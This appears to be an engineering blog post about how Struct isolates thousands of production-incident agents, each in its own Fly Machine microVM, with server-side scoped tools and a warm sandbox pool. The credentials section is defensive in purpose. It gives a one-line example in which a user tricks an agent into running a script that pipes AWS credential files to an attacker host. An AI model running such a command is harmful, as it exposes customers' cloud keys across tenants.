Struct: A Machine Per Agent, Thousands at a Time

Author

Name: Daniel Botha

Struct keeps prod running, starting with an agent that automates your on-call runbook. When an alert fires in a customer’s production system, a Struct agent picks it up and investigates: it cross-references logs, metrics, traces, and the codebase across that team’s existing observability stack to find the root cause, gauge customer impact, and dedupe the alert against related ones, in minutes, before an engineer has to start triaging by hand. From there it can open a PR or hand the fix to a coding agent.

Every one of those investigations is a different customer, a different incident, a different production system, each with its own scoped permissions for what the agent is allowed to touch. And because the agents work over sensitive material, code, logs, and telemetry, the boundaries between them have to be airtight. Secure by default.

Running one agent like this for yourself is a sweet weekend project. Running thousands of them at once, on customer data that can never leak between tenants, is a lot more terrifying. It was, nonetheless, the challenge that the Struct team decided to take on, and the architecture they landed on is worth walking through.

The four properties that aren’t negotiable

Struct’s view is that anything running user-facing agents on sensitive data needs four things, and none of them are optional.

Security. Hard multi-tenant isolation. One tenant’s data is never reachable by another tenant, and Struct’s own internal data never reaches a tenant’s agent. Access is scoped and short-lived.

Scalability. Thousands of agents running concurrently, with room to grow further without a re-architecture.

Performance. An agent starts working on the user’s request within a second.

Reliability. An agentic system has a lot of failure points. The platform has to stay up through them.

Security is the one with the most downside, and the threat landscape only gets worse. Most teams building agents that do real work will have to solve this eventually, so here is how Struct did.

One machine per agent

The decision the whole architecture hangs on: each agent runs in its own sandbox, and that sandbox is the tenant boundary. Struct runs its investigation agents as containers on Fly Machines, which are Firecracker microVMs.

That choice does the heaviest lifting on security. Every agent gets its own Machine with its own kernel. There is no shared runtime for one tenant’s agent to climb out of, and no path for an agent to read another tenant’s conversation or shell into another tenant’s data, because they were never on the same machine to begin with. Isolation is a property of the boundary itself, not a set of rules layered on top of a shared one.

The economics work the same way. Struct only pays for compute while an agent is actually working. When an agent finishes, its Machine is stopped; a stopped Machine sits in the pool without running up a compute bill, and starts again sub-second when the next message arrives. Once a Machine is provisioned, starting it is sub-second, so an agent picks up a request almost immediately.

The rest follows from the Machines API giving Struct full control of each Machine: scaling is horizontal, so more agents just means more Machines, and growing the fleet is a config change rather than a redesign. Each Machine also gets a Fly Volume for session persistence. An agent resumes a conversation from a session file on disk and reaches the logs and artifacts it pulled earlier, even if its Machine was stopped in between. When the session is over, Struct destroys the whole thing.

Keep the credentials off the agent’s machine

The obvious way to let an agent call a tool is to drop credentials on its machine and let it call the API directly. LLMs will suggest exactly this. In the immortal words of Admiral Ackbar, it’s a trap.

The Struct team saw this playing out in the wild and decided they needed to do better. Your agent automates compliance audits, so it needs to read a customer’s AWS CloudTrail. Customers grant your AWS account a role that can read their logs. You authenticate the aws CLI inside the sandbox, which writes credentials to JSON files under ~/.aws. Then a user gets your agent to run a friendly-looking super-safe-script.sh that quietly does cat ~/.aws/*.json | curl -d @- evil.com, and now one user is holding the keys to every customer’s data.

You can try to patch around this with user privileges and sandbox rules, but agents are good at finding holes, and a complex security model is one you will eventually get wrong. Secure by default beats secure-if-configured-correctly.

So Struct never puts tenant or platform credentials on the agent’s sandbox at all. Tools are scoped MCP servers that Struct hosts. Each server is scoped to a single agent’s permissions, calls the third-party API with credentials held server-side, and is locked down with auth and network controls. The tokens that reach an agent are short-lived and live in its process memory, never on disk.

A pool of warm sandboxes

Dispatching an agent cold is both slow and risky. Provisioning can fail. Installing dependencies takes minutes. Pulling and deploying a container image takes minutes. On the critical path, that is the user watching a spinner or an error.

Struct keeps a pool of pre-provisioned sandboxes instead. They sit stopped, so they are cheap to keep around, and start sub-second on demand. Replenishment runs in the background, so nobody waits for a new sandbox to come online, and failed provisions retry out of band. That background retry has let Struct ride out downstream outages with no customer impact.

When an agent spins up, it atomically claims a sandbox from the pool. Struct manages the pool in Postgres and uses FOR UPDATE SKIP LOCKED to settle concurrent claims cleanly. The sandbox starts, the agent dispatches. When the agent is done, its Machine is destroyed, never recycled, which kills an entire class of state-leakage bugs and keeps the security model simple.

Orchestration that survives a deploy

The pool makes starts fast and reliable, but three jobs still have to stay reliable across a multi-instance server: claiming sandboxes for incoming requests, keeping the pool stocked, and running and monitoring each agent. In-memory state can’t carry those. When a server instance restarts, anything in memory dies with it.

Struct uses Temporal, which is open source and self-hosted, for durable orchestration. Claims, provisions, and agent executions are workflows that survive process restarts, and retries, timeouts, and signal-based coordination come with it. One claim coordinator serves the pool FIFO and handles backpressure when it is drained. Provisions queue up to refill the pool, and when a new sandbox is ready a signal wakes the coordinator instead of a polling loop. When new code ships, in-flight claims, provisions, and agent runs ride across the rolling deploy rather than dropping.

A foundation, not a workaround

Harness, sandbox, scoped tools, pool, orchestration: most of this is portable to whatever sandbox you pick. Struct put its agents on Fly Machines because the Machine boundary handed them tenant isolation as a property of the platform, sub-second starts, a compute bill that tracks actual work, and a fleet that grows with a config change. For a product whose whole job is running someone else’s sensitive work in isolation, thousands of times over, that is the right place to build. Today it runs thousands of agents concurrently, and scaling further is a config change.

Previous post ↓: Kiloclaw: Hosting Thousands of Claws